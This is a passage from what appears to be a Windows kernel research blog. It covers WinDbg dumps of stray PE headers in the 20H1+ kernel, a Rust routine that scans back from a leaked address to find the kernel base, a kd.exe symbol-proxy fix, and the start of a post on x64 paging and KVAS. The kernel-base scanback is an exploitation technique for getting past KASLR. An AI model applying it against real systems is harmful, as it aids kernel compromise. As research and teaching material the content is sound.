       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #5
   .rsrc name
     3D8 virtual size
   20000 virtual address
     400 size of raw data
   1D600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #6
  .reloc name
    1304 virtual size
   21000 virtual address
    1400 size of raw data
   1DA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

Everything seems to parse out OK, but there are some minor issues... For starters, the machine type for this "DLL" is i386, which seems unlikely to be true since this is a 64-bit kernel. Another discrepancy is the debug directory, which seems to be completely bogus. It seems like there are a bunch of fake, mostly complete DOS/PE headers in that gap for some reason. The following command will find them all and dump their headers for closer inspection:

0: kd> .foreach (addr { s -[1]b nt L200000 4d 5a 90 00 03 }) { .echo ${addr}; dc ${addr} L20; !dh ${addr}; .echo }
NT header scan output
0xfffff806`6e200000
fffff806`6e200000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e200010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e200020  00000000 00000000 00000000 00000000  ................
fffff806`6e200030  00000000 00000000 00000000 00000118  ................
fffff806`6e200040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e200050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e200060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e200070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
    8664 machine (X64)
      21 number of sections
73F1C0C4 time date stamp Fri Aug 22 23:49:24 2031

       0 file pointer to symbol table
       0 number of symbols
      F0 size of optional header
      22 characteristics
            Executable
            App can handle >2gb addresses

OPTIONAL HEADER VALUES
     20B magic #
   14.20 linker version
  8B5600 size of code
  1B7E00 size of initialized data
  495000 size of uninitialized data
  98D010 address of entry point
    1000 base of code
         ----- new -----
fffff8066e200000 image base
    1000 section alignment
     200 file alignment
       1 subsystem (Native)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
 1046000 size of image
     800 size of headers
  A65799 checksum
0000000000080000 size of stack reserve
0000000000002000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4160  DLL characteristics
            High entropy VA supported
            Dynamic base
            NX compatible
            Guard
  134000 [   18C86] address [size] of Export Directory
  131630 [     168] address [size] of Import Directory
 1000000 [   3B23C] address [size] of Resource Directory
   C9000 [   67A7C] address [size] of Exception Directory
  A56600 [    2540] address [size] of Security Directory
 103C000 [    50B4] address [size] of Base Relocation Directory
   108E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    5B30 [     118] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
  131000 [     620] address [size] of Import Address Table Directory
       0 [       0] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
  .rdata name
   C7940 virtual size
    1000 virtual address
   C7A00 size of raw data
     800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only


Debug Directories(3)
    Type       Size     Address  Pointer
    cv           25       406e0    3fee0    Format: RSDS, guid, 1, ntkrnlmp.pdb
    (   13)    1568       40708    3ff08
    (   16)      24       41cc4    414c4

SECTION HEADER #2
  .pdata name
   67A7C virtual size
   C9000 virtual address
   67C00 size of raw data
   C8200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #3
  .idata name
    20C2 virtual size
  131000 virtual address
    2200 size of raw data
  12FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #4
  .edata name
   18C86 virtual size
  134000 virtual address
   18E00 size of raw data
  132000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #5
PROTDATA name
       1 virtual size
  14D000 virtual address
     200 size of raw data
  14AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #6
   GFIDS name
    8BFC virtual size
  14E000 virtual address
    8C00 size of raw data
  14B000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #7
    Pad1 name
   A9000 virtual size
  157000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #8
   .text name
  3C6F59 virtual size
  200000 virtual address
  3C7000 size of raw data
  153C00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #9
    PAGE name
  3C5716 virtual size
  5C7000 virtual address
  3C5800 size of raw data
  51AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #A
  PAGELK name
   24E74 virtual size
  98D000 virtual address
   25000 size of raw data
  8E0400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #B
POOLCODE name
     48B virtual size
  9B2000 virtual address
     600 size of raw data
  905400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #C
  PAGEKD name
    5B92 virtual size
  9B3000 virtual address
    5C00 size of raw data
  905A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #D
PAGEVRFY name
   320EC virtual size
  9B9000 virtual address
   32200 size of raw data
  90B600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #E
PAGEHDLS name
    25D6 virtual size
  9EC000 virtual address
    2600 size of raw data
  93D800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #F
PAGEBGFX name
    69EA virtual size
  9EF000 virtual address
    6A00 size of raw data
  93FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #10
INITKDBG name
   195BA virtual size
  9F6000 virtual address
   19600 size of raw data
  946800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #11
TRACESUP name
    175B virtual size
  A10000 virtual address
    1800 size of raw data
  95FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #12
KVASCODE name
    23DE virtual size
  A12000 virtual address
    2400 size of raw data
  961600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #13
  RETPOL name
     740 virtual size
  A15000 virtual address
     800 size of raw data
  963A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #14
  MINIEX name
    25AE virtual size
  A16000 virtual address
    2600 size of raw data
  964200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000020 flags
         Code
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #15
    INIT name
   8AA98 virtual size
  A19000 virtual address
   8AC00 size of raw data
  966800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000020 flags
         Code
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #16
    Pad2 name
  15C000 virtual size
  AA4000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
62000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Execute Read

SECTION HEADER #17
   .data name
   FA018 virtual size
  C00000 virtual address
   13000 size of raw data
  9F1400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #18
ALMOSTRO name
   272E0 virtual size
  CFB000 virtual address
    1400 size of raw data
  A04400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #19
CACHEALI name
    92C0 virtual size
  D23000 virtual address
     200 size of raw data
  A05800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #1A
PAGEDATA name
   12150 virtual size
  D2D000 virtual address
    1800 size of raw data
  A05A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #1B
PAGEVRFD name
   15D00 virtual size
  D40000 virtual address
    8000 size of raw data
  A07200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #1C
INITDATA name
   17C44 virtual size
  D56000 virtual address
     800 size of raw data
  A0F200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C2000020 flags
         Code
         Discardable
         (no align specified)
         Read Write

SECTION HEADER #1D
    Pad3 name
   92000 virtual size
  D6E000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C2000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Read Write

SECTION HEADER #1E
   CFGRO name
    1CC8 virtual size
  E00000 virtual address
    1E00 size of raw data
  A0FA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #1F
    Pad4 name
  1FE000 virtual size
  E02000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
CA000080 flags
         Uninitialized Data
         Discardable
         Not Paged
         (no align specified)
         Read Write

SECTION HEADER #20
   .rsrc name
   3B23C virtual size
 1000000 virtual address
   3B400 size of raw data
  A11800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #21
  .reloc name
    9964 virtual size
 103C000 virtual address
    9A00 size of raw data
  A4CC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

... many more headers

0xfffff806`6e3fc000
fffff806`6e3fc000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e3fc010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e3fc020  00000000 00000000 00000000 00000000  ................
fffff806`6e3fc030  00000000 00000000 00000000 000000e8  ................
fffff806`6e3fc040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e3fc050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e3fc060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e3fc070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

File Type: DLL
FILE HEADER VALUES
     14C machine (i386)
       6 number of sections
2AB009D1 time date stamp Thu Sep 10 22:52:01 1992

       0 file pointer to symbol table
       0 number of symbols
      E0 size of optional header
    2102 characteristics
            Executable
            32 bit word machine
            DLL

OPTIONAL HEADER VALUES
     10B magic #
   14.20 linker version
   1A800 size of code
    4600 size of initialized data
       0 size of uninitialized data
    7370 address of entry point
    1000 base of code
         ----- new -----
0000000076570000 image base
    1000 section alignment
     200 file alignment
       3 subsystem (Windows CUI)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
   23000 size of image
     400 size of headers
   233EC checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4540  DLL characteristics
            Dynamic base
            NX compatible
            No structured exception handler
            Guard
   11D80 [    99D3] address [size] of Export Directory
   1D364 [     154] address [size] of Import Directory
   20000 [     3D8] address [size] of Resource Directory
       0 [       0] address [size] of Exception Directory
   1EE00 [    2690] address [size] of Security Directory
   21000 [    1304] address [size] of Base Relocation Directory
    28E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    1000 [      AC] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
   1D000 [     360] address [size] of Import Address Table Directory
    E0AC [     320] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
   .text name
   1A753 virtual size
    1000 virtual address
   1A800 size of raw data
     400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read


Debug Directories(3)
    Type       Size     Address  Pointer
    (   96)   60f01       d640f    a340f
    (1342988301)    300b       c1d01    b741d
    (4028183069)c015e017       a2619  10f0114

SECTION HEADER #2
   .data name
     4F4 virtual size
   1C000 virtual address
     200 size of raw data
   1AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #3
  .idata name
    1D9A virtual size
   1D000 virtual address
    1E00 size of raw data
   1AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #4
  .didat name
     8C4 virtual size
   1F000 virtual address
     A00 size of raw data
   1CC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #5
   .rsrc name
     3D8 virtual size
   20000 virtual address
     400 size of raw data
   1D600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #6
  .reloc name
    1304 virtual size
   21000 virtual address
    1400 size of raw data
   1DA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

The first one is the header dump for the kernel. Note the valid debug directory. If you want the full output you can get that here.

Some of these headers are less valid than they appear. The last header tells us that the code section starts at an offset of 0x1000 bytes, as is common for PE files. Investigating that memory location yields not code, but ASCII data.

0: kd> db fffff806`6e3f0000+1000
fffff806`6e3f1000  29 0a 2d 2d 0a 0a 50 6f-73 74 20 61 20 6d 65 73  ).--..Post a mes
fffff806`6e3f1010  73 61 67 65 20 74 6f 20-63 6f 6d 70 6c 65 74 69  sage to completi
fffff806`6e3f1020  6f 6e 20 70 6f 72 74 2e-00 00 00 00 00 00 00 00  on port.........
fffff806`6e3f1030  52 65 61 64 46 69 6c 65-28 24 73 65 6c 66 2c 20  ReadFile($self, 
fffff806`6e3f1040  68 61 6e 64 6c 65 2c 20-73 69 7a 65 2c 20 2f 29  handle, size, /)
fffff806`6e3f1050  0a 2d 2d 0a 0a 53 74 61-72 74 20 6f 76 65 72 6c  .--..Start overl
fffff806`6e3f1060  61 70 70 65 64 20 72 65-61 64 2e 00 00 00 00 00  apped read......
fffff806`6e3f1070  4f 76 65 72 6c 61 70 70-65 64 28 65 76 65 6e 74  Overlapped(event

It is possible that these DLLs/drivers were really here at some point but they are gone now and may have been replaced by other data. Regardless, what is left will mess up our page-at-a-time scanback technique to find the base of the kernel.

hal.dll

Another interesting change in the kernel in 20H1+ is that the Hardware Abstraction Layer (HAL) has moved into the kernel image itself and no longer lives inside of hal.dll. If you open up hal.dll in a disassembler, you will notice that it actually does not even have a .text section. It is just a forwarding DLL that forwards exports into the kernel. The forwarding is done to not break backwards compatibility with drivers and components that expect to import HAL functionality from hal.dll and not ntoskrnl.exe.

hal.dll has no code! It does still have the Hal* exports.

Fixing Scanback

Since the new version of the kernel has the .text section starting at 0x200000 we can adjust our scanback to the following algorithm:

const KUSER_SHARED_DATA: usize = 0xFFFFF78000000000;
const KUSER_NT_MAJOR_VERSION_OFFSET: usize = 0x26C;
const KUSER_NT_BUILD_NUMBER_OFFSET: usize = 0x260;
let major_version: *const u32 = (KUSER_SHARED_DATA + KUSER_NT_MAJOR_VERSION_OFFSET) as _;
let build_number: *const u32 = (KUSER_SHARED_DATA + KUSER_NT_BUILD_NUMBER_OFFSET) as _;
// Newer builds: step by the 0x200000 .text offset. Older builds: step by page.
let step: usize = if unsafe { *major_version >= 10 && *build_number > 19000 } {
    0x200000
} else {
    0x1000
};
// Round the leaked address down to a multiple of the step.
let mut cursor = (leaked_addr as usize & !(step - 1)) as *const u16;
unsafe {
    // 0x5a4d is "MZ" read as a little-endian u16.
    while *cursor != 0x5a4d {
        // Step in bytes: cursor.sub(step) on a *const u16 would move 2 * step bytes.
        cursor = (cursor as usize - step) as *const u16;
    }
}
let kernel_base = cursor as usize;

This code has to be version dependent, so we reuse the KUSER_SHARED_DATA version detection method to decide which step amount to use. The algorithm is the same as before, but instead of rounding down to the nearest page and then scanning backward by page size, we round down to a multiple of 0x200000 and step by that amount. This technique actually also works on 19H1, since the kernel is mapped with large pages (yes, entirely RWX in 19H1) and large pages happen to be 0x200000 bytes in size.
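The effect of the step size can be tried out in user mode against an ordinary buffer. The following is only a sketch: scan_back and the buffer layout are hypothetical stand-ins for kernel memory, with offsets into the buffer playing the role of addresses.

```rust
/// Walk backward from `leak` in `step`-sized strides until the two bytes at
/// the cursor are "MZ". `image` is a hypothetical stand-in for kernel memory.
fn scan_back(image: &[u8], leak: usize, step: usize) -> Option<usize> {
    assert!(step.is_power_of_two());
    // Round the leaked offset down to a multiple of the stride.
    let mut cursor = leak & !(step - 1);
    loop {
        // Out-of-bounds reads end the scan instead of faulting.
        if image.get(cursor..cursor + 2)? == &b"MZ"[..] {
            return Some(cursor);
        }
        // Stop at the start of the buffer instead of wrapping around.
        cursor = cursor.checked_sub(step)?;
    }
}
```

With a real header at offset 0x200000 and a stale "MZ" on some page boundary between it and the leak, a 0x1000 stride stops at the stale header while a 0x200000 stride skips over it.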

Another alternative is to parse each header and try to figure out which one is ntoskrnl.exe. I've tried two alternatives that work: checking the number of sections or looking up the PDB path via the DEBUG data directory.
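As a rough sketch of the section-count check, the function below reads NumberOfSections from a candidate page using the standard PE layout (e_lfanew at offset 0x3c, IMAGE_FILE_HEADER right after the 4-byte "PE\0\0" signature). The helper names and the min_sections threshold are assumptions for illustration; the dumps above only show that the kernel has far more sections than the 6-section leftover image.

```rust
/// Read a little-endian u16 from `buf` at `off`, if it is in bounds.
fn read_u16(buf: &[u8], off: usize) -> Option<u16> {
    let b = buf.get(off..off.checked_add(2)?)?;
    Some(u16::from_le_bytes([b[0], b[1]]))
}

/// Read a little-endian u32 from `buf` at `off`, if it is in bounds.
fn read_u32(buf: &[u8], off: usize) -> Option<u32> {
    let b = buf.get(off..off.checked_add(4)?)?;
    Some(u32::from_le_bytes([b[0], b[1], b[2], b[3]]))
}

/// Return NumberOfSections if `page` starts with a plausible PE header.
fn pe_section_count(page: &[u8]) -> Option<u16> {
    if read_u16(page, 0)? != 0x5a4d {
        return None; // no "MZ"
    }
    let e_lfanew = read_u32(page, 0x3c)? as usize;
    if read_u32(page, e_lfanew)? != 0x0000_4550 {
        return None; // no "PE\0\0"
    }
    // Skip the signature (4 bytes) and Machine (2 bytes).
    read_u16(page, e_lfanew.checked_add(6)?)
}

/// Hypothetical heuristic: accept only headers with at least `min_sections`.
fn looks_like_kernel(page: &[u8], min_sections: u16) -> bool {
    pe_section_count(page).map_or(false, |n| n >= min_sections)
}
```

In kernel shellcode the page would be read through a raw pointer rather than a slice, and the threshold would have to be validated per build. The PDB path check is stricter but needs more parsing.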

If Microsoft decides to change the .text section offset or puts unmapped regions between sections this will need to be re-written.

Wrap Up

I hope that this post has been informative! I thought there was going to be more in the solutions section than literature review, but I think this ended up being a good round up of info regardless. It's been something I've wanted to post for a while but finally took the time to write it up properly.

Anyway, have a good day and remember to ask yourself... ~~did you set it to wumbo?~~

Using kd.exe from VSCode Remote

I wanted to do a small post here, just because the answer to this issue was sort of scattered on the internet. Bigger post coming soon on some kernel exploit technique stuff.

It turns out that when running kd.exe for command line kernel debugging from VSCode remote, symbol resolution breaks completely. Why? It looks like symsrv.dll uses WinHTTP instead of WinINet for its requests when it runs from a service. You can replicate this behavior in a normal shell by setting $env:DBGHELP_WINHTTP=1 in a PowerShell window and then running kd.exe. For some reason, WinHTTP always tries to use a proxy server, so you have to tell it not to via the following key in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Symbol Server -> NoInternetProxy -> DWORD = 1

You should also set it in HKLM\SOFTWARE\WOW6432Node\Microsoft\Symbol Server, in case you are using a 32-bit debugger.

This issue will happen with cdb.exe and kd.exe, so I hope this solution helps someone.

https://stackoverflow.com/questions/5095328/cannot-download-microsoft-symbols-when-running-cdb-in-a-windows-service
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/configuring-the-registry

Windows 10 KVAS and Software SMEP

Kernel Virtual Address Shadow (KVAS) is the Windows implementation of Kernel Page Table Isolation (KPTI). It was introduced to mitigate the Meltdown vulnerability, which allowed an attacker that could execute code in user mode to leak out data from the kernel by abusing a side channel. While there are plenty of papers and blog posts on Meltdown and KVAS, there isn't much info on an interesting feature that KVAS enables: software SMEP. Unfortunately or fortunately, depending on your interest level in this post and Windows internals, understanding how software SMEP works requires knowledge of x86_64 paging, regular SMEP, and KVAS, so I'll be getting into those topics enough to give you an understanding of the underlying technology. Near the end I'll be running some experiments to show the internals of what I covered in the technical sections prior.

x64 Paging on Windows

First, I'm going to dive into a short introduction to x86_64 (4-level) paging, the structures involved, and WinDbg commands to interact with the page hierarchy, just so the experiments later on are more understandable. A lot of this information is almost never presented together, so I think collecting it in a "here's what you need to know" format is useful. If you want more info consult the Intel manuals or check out Connor McGarr's blog. Connor does a great job of explaining the basics, so you may want to read his post over before continuing here if you don't already have at least a vague understanding of multi-level paging.

[[more]]

_MMPTE_HARDWARE

The structure that represents a page table entry on x86_64 is nt!_MMPTE_HARDWARE. It is an 8 byte structure with a lot of information:

0: kd> dt -v nt!_MMPTE_HARDWARE
struct _MMPTE_HARDWARE, 18 elements, 0x8 bytes
   +0x000 Valid               : Bitfield Pos 0, 1 Bit
   +0x000 Dirty1              : Bitfield Pos 1, 1 Bit
   +0x000 Owner               : Bitfield Pos 2, 1 Bit
   +0x000 WriteThrough        : Bitfield Pos 3, 1 Bit
   +0x000 CacheDisable        : Bitfield Pos 4, 1 Bit
   +0x000 Accessed            : Bitfield Pos 5, 1 Bit
   +0x000 Dirty               : Bitfield Pos 6, 1 Bit
   +0x000 LargePage           : Bitfield Pos 7, 1 Bit
   +0x000 Global              : Bitfield Pos 8, 1 Bit
   +0x000 CopyOnWrite         : Bitfield Pos 9, 1 Bit
   +0x000 Unused              : Bitfield Pos 10, 1 Bit
   +0x000 Write               : Bitfield Pos 11, 1 Bit
   +0x000 PageFrameNumber     : Bitfield Pos 12, 36 Bits
   +0x000 ReservedForHardware : Bitfield Pos 48, 4 Bits
   +0x000 ReservedForSoftware : Bitfield Pos 52, 4 Bits
   +0x000 WsleAge             : Bitfield Pos 56, 4 Bits
   +0x000 WsleProtection      : Bitfield Pos 60, 3 Bits
   +0x000 NoExecute           : Bitfield Pos 63, 1 Bit

Some fields of particular importance:

  • Valid - this entry is valid. must be 1 to consider the data inside the rest of the structure valid.
  • Owner - 0 for kernel mode pages, 1 for user mode pages. corresponds to the KPROCESSOR_MODE enum in the DDK.
  • LargePage - noted here, discussed below!
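  • Write - a software-defined write bit at position 11. the bit the hardware checks for read only (0) vs. R/W (1) is bit 1, which this structure names Dirty1.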
  • PageFrameNumber - the physical address of the base of the next level of paging. mask these bits out or pull them out and shift left by 12 (0xc) to get the address, shown in detail below. abbreviated PFN.
  • NoExecute - NX bit. code cannot be executed in these pages.
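To make the layout concrete, here is a small sketch that pulls a few of these fields out of a raw 64-bit entry, using the bit positions from the dt output above. The PteFields struct and decode_pte function are illustrative names, not anything from the Windows headers.

```rust
/// A few fields of a raw page table entry, at the bit positions shown by
/// `dt -v nt!_MMPTE_HARDWARE`. Names here are illustrative only.
#[derive(Debug, PartialEq)]
struct PteFields {
    valid: bool,      // bit 0
    owner_user: bool, // bit 2 (1 = user mode page)
    large_page: bool, // bit 7
    pfn: u64,         // bits 12..=47 (36 bits)
    no_execute: bool, // bit 63
}

fn decode_pte(raw: u64) -> PteFields {
    let bit = |n: u32| (raw >> n) & 1 == 1;
    PteFields {
        valid: bit(0),
        owner_user: bit(2),
        large_page: bit(7),
        // Shift the flag bits away, then keep the 36-bit page frame number.
        pfn: (raw >> 12) & ((1u64 << 36) - 1),
        no_execute: bit(63),
    }
}
```

For a raw value such as 0x8100000003806025, this yields a valid, user mode, non-executable entry with PFN 0x3806. Shifting the PFN left by 12 gives the physical base address 0x3806000.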

Each level of the page table hierarchy has an _MMPTE_HARDWARE entry. If a permission is set at a lower level, then the permission must be set at all higher levels as well in order for it to take effect. Conversely, if a permission is set at a higher level, it must also be set at all lower levels in order for it to have effect.

Let's look at an example in user mode on a system with KVAS disabled:

0: kd> !process 0 0 explorer.exe
PROCESS ffffc8064497b340
    SessionId: 1  Cid: 1038    Peb: 0090c000  ParentCid: 100c
    DirBase: bc33c000  ObjectTable: ffffa2827c3a1800  HandleCount: 1884.
    Image: explorer.exe
0: kd> .process /p /i ffffc8064497b340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff805`2e1fd0b0 cc              int     3
1: kd> .reload
Connected to Windows 10 19041 x64 target at (Sun Nov 15 19:51:29.691 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...
1: kd> bp /p @$proc ntdll!NtCreateFile
1: kd> g
Breakpoint 0 hit
ntdll!NtCreateFile:
0033:00007ffc`3608c830 4c8bd1          mov     r10,rcx
1: kd> !pte kernel32
                                           VA 00007ffc35ee0000
PXE at FFFFE5F2F97CB7F8    PPE at FFFFE5F2F96FFF80    PDE at FFFFE5F2DFFF0D78    PTE at FFFFE5BFFE1AF700
contains 0A000000BBF48867  contains 0A000000BC34E867  contains 0A000000BC34F867  contains 8100000003806025
pfn bbf48     ---DA--UWEV  pfn bc34e     ---DA--UWEV  pfn bc34f     ---DA--UWEV  pfn 3806      ----A--UR-V

There are executable pages in kernel32, but the page containing the header should not be executable. This is reflected in the page hierarchy above, where the PXE, PPE, and PDE are all RWX, but the PTE indicates that the page is read only. The !pte command is detailed more in a few sections, so don't worry if the output is confusing at this moment.
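The way the levels combine can be sketched in a few lines. This assumes the architectural x86_64 bit positions (bit 0 present, bit 1 read/write, bit 2 user/supervisor, bit 63 execute-disable) and ignores everything else that affects access, such as CR0.WP or SMEP. The Access struct and effective_access function are hypothetical names.

```rust
/// Effective access for one translation. Illustrative only.
#[derive(Debug, PartialEq)]
struct Access {
    present: bool,
    user: bool,
    writable: bool,
    executable: bool,
}

/// Combine the raw entries of every level, from the top level down.
fn effective_access(entries: &[u64]) -> Access {
    let all = |n: u32| entries.iter().all(|&e| (e >> n) & 1 == 1);
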